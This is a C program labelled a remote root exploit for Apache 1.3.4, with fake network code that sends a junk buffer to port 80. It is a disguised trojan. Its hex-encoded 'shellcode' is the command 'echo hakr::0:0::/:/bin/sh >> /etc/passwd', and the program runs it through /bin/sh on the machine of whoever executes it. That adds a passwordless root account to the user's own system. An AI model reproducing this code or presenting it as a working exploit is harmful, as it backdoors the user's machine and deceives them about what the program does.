/* remote apache 1.3.4 root exploit (linux) */

#include <stdio.h>
#include <netdb.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

char shellcode[] = \
  "\x65\x63\x68\x6f\x20\x68\x61\x6b\x72\x3a\x3a\x30\x3a"
  "\x30\x3a\x3a\x2f\x3a\x2f\x62\x69\x6e\x2f\x73\x68\x20"
  "\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";

#define  NOP  0x90
#define  BSIZE  256
#define  OFFSET  400
#define  ADDR  0xbffff658
#define ASIZE  2000

int
main(int argc, char *argv[])
{
  char *buffer;
  int s;
  struct hostent *hp;
  struct sockaddr_in sin;
  if (argc != 2) {
    printf("%s <target>\n", argv[0]);
    exit(1);
    }
  buffer = (char *) malloc(BSIZE + ASIZE + 100);
  if (buffer == NULL) {
    printf("Not enough memory\n");
    exit(1);
    }
  memcpy(&buffer[BSIZE - strlen(shellcode)], shellcode,
    strlen(shellcode));
  buffer[BSIZE + ASIZE] = ';';
  buffer[BSIZE + ASIZE + 1] = '\0';
  hp = gethostbyname(argv[1]);
  if (hp == NULL) {
    printf("no such server\n");
    exit(1);
    }
  bzero(&sin, sizeof(sin));
  bcopy(hp->h_addr, (char *)&sin.sin_addr, hp->h_length);
  sin.sin_family = AF_INET;
  sin.sin_port = htons(80);
  s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
  if (s < 0) {
    printf("Can't open socket\n");
    exit(1);
    }
  if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
    printf("Connection refused\n");
    exit(1);
    }
  printf("sending exploit code...\n");
  if (send(s, buffer, strlen(buffer), 0) != 1)
    printf("exploit was successful!\n");
    else
    printf("sorry, this site isn't vulnerable\n");
  printf("waiting for shell.....\n");
  if (fork() == 0)
    execl("/bin/sh", "sh", "-c", shellcode, 0);
    else
    wait(NULL);
  while (1) { /* shell */ }
}